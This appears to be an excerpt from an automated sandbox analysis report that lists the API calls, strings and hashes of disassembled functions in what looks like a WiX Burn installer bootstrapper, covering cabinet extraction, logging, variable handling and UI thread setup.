                                                                                                                                                                    • String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$`+?s$cryputil.cpp
                                                                                                                                                                    • API String ID: 4214558900-776468437
                                                                                                                                                                    • Opcode ID: aaa4d235940a3db6f7180b428a739a8e4805bb7ddad92f81973985c88bb6013e
                                                                                                                                                                    • Instruction ID: 54e935cf7006dc5b1d4342d1865e609ddf601b59e750214d3f68cb1c936216c1
                                                                                                                                                                    • Opcode Fuzzy Hash: aaa4d235940a3db6f7180b428a739a8e4805bb7ddad92f81973985c88bb6013e
                                                                                                                                                                    • Instruction Fuzzy Hash: 0521A7329423B2A7C7319F76AD49BAF6990AB10F91F020139FD10AF3B1E7608C41DAD4
                                                                                                                                                                    Function 00CA1741 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 106COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,00C8C3EB,?,00000000,?,00C8C47F), ref: 00CA1778
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C8C3EB,?,00000000,?,00C8C47F,00C85405,?,?,00C85445,00C85445,00000000,?,00000000), ref: 00CA1781
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateErrorEventLast
                                                                                                                                                                    • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
                                                                                                                                                                    • API String ID: 545576003-938279966
                                                                                                                                                                    • Opcode ID: 9755662ab83996b624e96fdb0c3ebe9675084566e3d3ae3c145856af3080a2ef
                                                                                                                                                                    • Instruction ID: 3f64b1336c2aa5200b59d8c7a0b8c36f5135ac79cfcf6b9e82abad2959fcef7f
                                                                                                                                                                    • Opcode Fuzzy Hash: 9755662ab83996b624e96fdb0c3ebe9675084566e3d3ae3c145856af3080a2ef
                                                                                                                                                                    • Instruction Fuzzy Hash: 6521E577E4163776D32126A58D46F2B6A9CEB01BB8F160226FE10FB2C1EB54DC0086E5
                                                                                                                                                                    Function 00CA08C2 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 00CA08F2
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 00CA090A
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 00CA090F
                                                                                                                                                                    • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00CA0912
                                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 00CA091C
                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 00CA098B
                                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 00CA0998
                                                                                                                                                                    Strings
                                                                                                                                                                    • <the>.cab, xrefs: 00CA08EB
                                                                                                                                                                    • Failed to open cabinet file: %hs, xrefs: 00CA09C9
                                                                                                                                                                    • cabextract.cpp, xrefs: 00CA0940, 00CA09BC
                                                                                                                                                                    • Failed to add virtual file pointer for cab container., xrefs: 00CA0971
                                                                                                                                                                    • Failed to duplicate handle to cab container., xrefs: 00CA094A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                                                                                                                    • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                                                                                                                                    • API String ID: 3030546534-3446344238
                                                                                                                                                                    • Opcode ID: a586adadee65919cdd7c0d300f9ef51cf9737db2639ef2cafd9632207f575121
                                                                                                                                                                    • Instruction ID: afcca168d272dfcd227c8aa47ffc7412ad016a15e9a062168d194bae6ac08824
                                                                                                                                                                    • Opcode Fuzzy Hash: a586adadee65919cdd7c0d300f9ef51cf9737db2639ef2cafd9632207f575121
                                                                                                                                                                    • Instruction Fuzzy Hash: 2931EB72941236BBEB215BA5CC49F9FBE6CEF057A4F210126FE04B7251D7209D00D6E5
                                                                                                                                                                    Function 00C93F9B Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 220sleepCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00C93AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00C93FB5,feclient.dll,?,00000000,?,?,?,00C84B12), ref: 00C93B42
                                                                                                                                                                    • Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00C84B12,?,?,00CCB488,?,00000001,00000000,00000000), ref: 00C9404C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseSleep
                                                                                                                                                                    • String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
                                                                                                                                                                    • API String ID: 2834455192-2673269691
                                                                                                                                                                    • Opcode ID: 1f1c35345fcadae0153f3712ade925bc7fddba957d64b0274ec109a64e12ecef
                                                                                                                                                                    • Instruction ID: 6d20c8475968f3f877fca653176b17fc3444a73db6df511f7bef1f8ae71f82e4
                                                                                                                                                                    • Opcode Fuzzy Hash: 1f1c35345fcadae0153f3712ade925bc7fddba957d64b0274ec109a64e12ecef
                                                                                                                                                                    • Instruction Fuzzy Hash: 6B61D471A00256BBDF299F64CC4EF7A77A9EF10340B14416AFD14DB240EB70EE91A791
                                                                                                                                                                    Function 00C86DB9 Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 166COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000001,?,00000000,00C85445,00000006,?,00C882B9,?,?,?,00000000,00000000,00000001), ref: 00C86DC8
                                                                                                                                                                      • Part of subcall function 00C856A9: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00C86595,00C86595,?,00C8563D,?,?,00000000), ref: 00C856E5
                                                                                                                                                                      • Part of subcall function 00C856A9: GetLastError.KERNEL32(?,00C8563D,?,?,00000000,?,?,00C86595,?,00C87F02,?,?,?,?,?), ref: 00C85714
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,00C882B9), ref: 00C86F59
                                                                                                                                                                    Strings
                                                                                                                                                                    • Setting numeric variable '%ls' to value %lld, xrefs: 00C86EFA
                                                                                                                                                                    • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00C86F6B
                                                                                                                                                                    • Unsetting variable '%ls', xrefs: 00C86F15
                                                                                                                                                                    • Failed to find variable value '%ls'., xrefs: 00C86DE3
                                                                                                                                                                    • variable.cpp, xrefs: 00C86E4B
                                                                                                                                                                    • Setting string variable '%ls' to value '%ls', xrefs: 00C86EED
                                                                                                                                                                    • Failed to insert variable '%ls'., xrefs: 00C86E0D
                                                                                                                                                                    • Failed to set value of variable: %ls, xrefs: 00C86F41
                                                                                                                                                                    • Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00C86ED0
                                                                                                                                                                    • Setting hidden variable '%ls', xrefs: 00C86E86
                                                                                                                                                                    • Attempt to set built-in variable value: %ls, xrefs: 00C86E56
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                                                                                                                                    • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
                                                                                                                                                                    • API String ID: 2716280545-445000439
                                                                                                                                                                    • Opcode ID: 55bb1e52f189505c8c449873a9287776d260b16a560e86e0795e10fb67cdc1cb
                                                                                                                                                                    • Instruction ID: dc106633c1fe065971e5b963d7db15eba47cca3f7f9ad9ab8d5969ede7b63055
                                                                                                                                                                    • Opcode Fuzzy Hash: 55bb1e52f189505c8c449873a9287776d260b16a560e86e0795e10fb67cdc1cb
                                                                                                                                                                    • Instruction Fuzzy Hash: A7512A71A40225E7CB30BF55CC4AF6B3BA8EB51708F20002DF95566282C271ED41CBE9
                                                                                                                                                                    Function 00C84AE5 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 144windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsWindow.USER32(?), ref: 00C84C64
                                                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C84C75
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to set layout directory variable to value provided from command-line., xrefs: 00C84C06
                                                                                                                                                                    • Failed to create the message window., xrefs: 00C84B98
                                                                                                                                                                    • Failed to query registration., xrefs: 00C84BAE
                                                                                                                                                                    • Failed while running , xrefs: 00C84C2A
                                                                                                                                                                    • Failed to set registration variables., xrefs: 00C84BDE
                                                                                                                                                                    • WixBundleLayoutDirectory, xrefs: 00C84BF5
                                                                                                                                                                    • Failed to open log., xrefs: 00C84B18
                                                                                                                                                                    • Failed to check global conditions, xrefs: 00C84B49
                                                                                                                                                                    • Failed to set action variables., xrefs: 00C84BC4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MessagePostWindow
                                                                                                                                                                    • String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
                                                                                                                                                                    • API String ID: 3618638489-3051724725
                                                                                                                                                                    • Opcode ID: 0b0441b8c90fb2d10162e5ce3ccf746adb8c8ac05e738bf8d2b015b8c9290de4
                                                                                                                                                                    • Instruction ID: 8c0b8cfe07dfca57546223ce5745867d5426472c8443eccc8bf36a0416c74b15
                                                                                                                                                                    • Opcode Fuzzy Hash: 0b0441b8c90fb2d10162e5ce3ccf746adb8c8ac05e738bf8d2b015b8c9290de4
                                                                                                                                                                    • Instruction Fuzzy Hash: 2B41E871601A2BBBCB1E7A60CC4AFBAB66CFF00759F004229F815A7150EB70ED54A7D4
                                                                                                                                                                    Function 00C9EA7D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00C8548E,?,?), ref: 00C9EA9D
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C8548E,?,?), ref: 00C9EAAA
                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_0001E7B4,?,00000000,00000000), ref: 00C9EB03
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C8548E,?,?), ref: 00C9EB10
                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,00C8548E,?,?), ref: 00C9EB4B
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00C8548E,?,?), ref: 00C9EB6A
                                                                                                                                                                    • CloseHandle.KERNELBASE(?,?,00C8548E,?,?), ref: 00C9EB77
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                                                                    • String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                                                                                                                                    • API String ID: 2351989216-3599963359
                                                                                                                                                                    • Opcode ID: 1d85fe17b3bbe7cd723c94227283c1a23378113d03d6fd41dcd4d68a8d310a82
                                                                                                                                                                    • Instruction ID: e98c5fc500fa12f2866a65509ef862a62a123e5d06aa303f0d8411067ad5e10b
                                                                                                                                                                    • Opcode Fuzzy Hash: 1d85fe17b3bbe7cd723c94227283c1a23378113d03d6fd41dcd4d68a8d310a82
                                                                                                                                                                    • Instruction Fuzzy Hash: A7317276D01229BBDB10DFD98D89A9EBBACFF14750F11016AF915F7280E6309E009AA5
                                                                                                                                                                    Function 00CA14E1 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,74DF2F60,?,?,00C85405,00C853BD,00000000,00C85445), ref: 00CA1506
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00CA1519
                                                                                                                                                                    • GetExitCodeThread.KERNELBASE(00CCB488,?), ref: 00CA155B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00CA1569
                                                                                                                                                                    • ResetEvent.KERNEL32(00CCB460), ref: 00CA15A4
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00CA15AE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                                                                                                                                    • String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                                                                                                                                    • API String ID: 2979751695-3400260300
                                                                                                                                                                    • Opcode ID: 0381ecc0f3d1f1a56d66112b82abb3e2628c97f67aca9dd27beba687a54aad56
                                                                                                                                                                    • Instruction ID: 5f56df6bcb6e05eac66559437cdba145d0deec69993ff38d760517a53cc14d84
                                                                                                                                                                    • Opcode Fuzzy Hash: 0381ecc0f3d1f1a56d66112b82abb3e2628c97f67aca9dd27beba687a54aad56
                                                                                                                                                                    • Instruction Fuzzy Hash: 7C31B4B1E40206EBDB109FA6CD05BAE77F8EB45714F14416BFD16D62A0E730CE00AB65
                                                                                                                                                                    Function 00C82DBF Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 203sleepfiletimeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 00C82E5F
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00C82E69
                                                                                                                                                                    • GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00C82F09
                                                                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00C82F96
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00C82FA3
                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00C82FB7
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00C8301F
                                                                                                                                                                    Strings
                                                                                                                                                                    • pathutil.cpp, xrefs: 00C82E8D
                                                                                                                                                                    • %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00C82F66
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
                                                                                                                                                                    • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
                                                                                                                                                                    • API String ID: 3480017824-1101990113
                                                                                                                                                                    • Opcode ID: cc2b9e5d1eb6a25be5992d7968e9d89c3da610ddfa2543e80abed16d52c3f348
                                                                                                                                                                    • Instruction ID: 7c24e5261c6b3fef5b288a6ed7d189f642dedc665a6ebffe0aaa25a96722d987
                                                                                                                                                                    • Opcode Fuzzy Hash: cc2b9e5d1eb6a25be5992d7968e9d89c3da610ddfa2543e80abed16d52c3f348
                                                                                                                                                                    • Instruction Fuzzy Hash: 0F715272D01139ABDB31AFA4DC4DBAEB7B8AB08715F100195FA15E7190D7349E80DFA8
                                                                                                                                                                    Function 00C8CBC5 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 144COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,00C853BD,00000000,00C85489,00C85445,WixBundleUILevel,840F01E8,?,00000001), ref: 00C8CC1C
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to extract file., xrefs: 00C8CCE7
                                                                                                                                                                    • Failed to ensure directory exists, xrefs: 00C8CCEE
                                                                                                                                                                    • Failed to get next stream., xrefs: 00C8CD03
                                                                                                                                                                    • payload.cpp, xrefs: 00C8CD1D
                                                                                                                                                                    • Payload was not found in container: %ls, xrefs: 00C8CD29
                                                                                                                                                                    • Failed to get directory portion of local file path, xrefs: 00C8CCF5
                                                                                                                                                                    • Failed to concat file paths., xrefs: 00C8CCFC
                                                                                                                                                                    • Failed to find embedded payload: %ls, xrefs: 00C8CC48
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString
                                                                                                                                                                    • String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
                                                                                                                                                                    • API String ID: 1825529933-1711239286
                                                                                                                                                                    • Opcode ID: c4df28390a5770d0bb36dba9b73ce0e50d1eef12a932c4025c0fc220580311fb
                                                                                                                                                                    • Instruction ID: dd86715c8d2b6928d53570f4b9fd563a2b127e7ff2e9ef17e6efb43a0fb023ae
                                                                                                                                                                    • Opcode Fuzzy Hash: c4df28390a5770d0bb36dba9b73ce0e50d1eef12a932c4025c0fc220580311fb
                                                                                                                                                                    • Instruction Fuzzy Hash: E241C131900215EBCF25BF59CCC5EAEBBA5BF00718F10817EE915AB251D7709E41EBA8
                                                                                                                                                                    Function 00C84796 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 00C847BB
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00C847C1
                                                                                                                                                                    • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C8484F
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to load UX., xrefs: 00C84804
                                                                                                                                                                    • wininet.dll, xrefs: 00C847EE
                                                                                                                                                                    • Failed to create engine for UX., xrefs: 00C847DB
                                                                                                                                                                    • engine.cpp, xrefs: 00C8489B
                                                                                                                                                                    • Failed to start bootstrapper application., xrefs: 00C8481D
                                                                                                                                                                    • Unexpected return value from message pump., xrefs: 00C848A5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Message$CurrentPeekThread
                                                                                                                                                                    • String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
                                                                                                                                                                    • API String ID: 673430819-2573580774
                                                                                                                                                                    • Opcode ID: e05598249480a7c7f64c0ddaa4089320612635c0d612c779358d97659b3c4e62
                                                                                                                                                                    • Instruction ID: 3c07d58abee82840468fbb9c59ec24973ad81d45e1888fce8770095e1fba25ea
                                                                                                                                                                    • Opcode Fuzzy Hash: e05598249480a7c7f64c0ddaa4089320612635c0d612c779358d97659b3c4e62
                                                                                                                                                                    • Instruction Fuzzy Hash: D841A371A00556FFDB18ABA4CC86FBEB7ACEF04318F100129F915E7290DB30AD4597A4
                                                                                                                                                                    Function 00C8D6C9 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,00C847FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00C8548E,?), ref: 00C8D6DA
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C847FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00C8548E,?,?), ref: 00C8D6E7
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 00C8D71F
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C847FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00C8548E,?,?), ref: 00C8D72B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
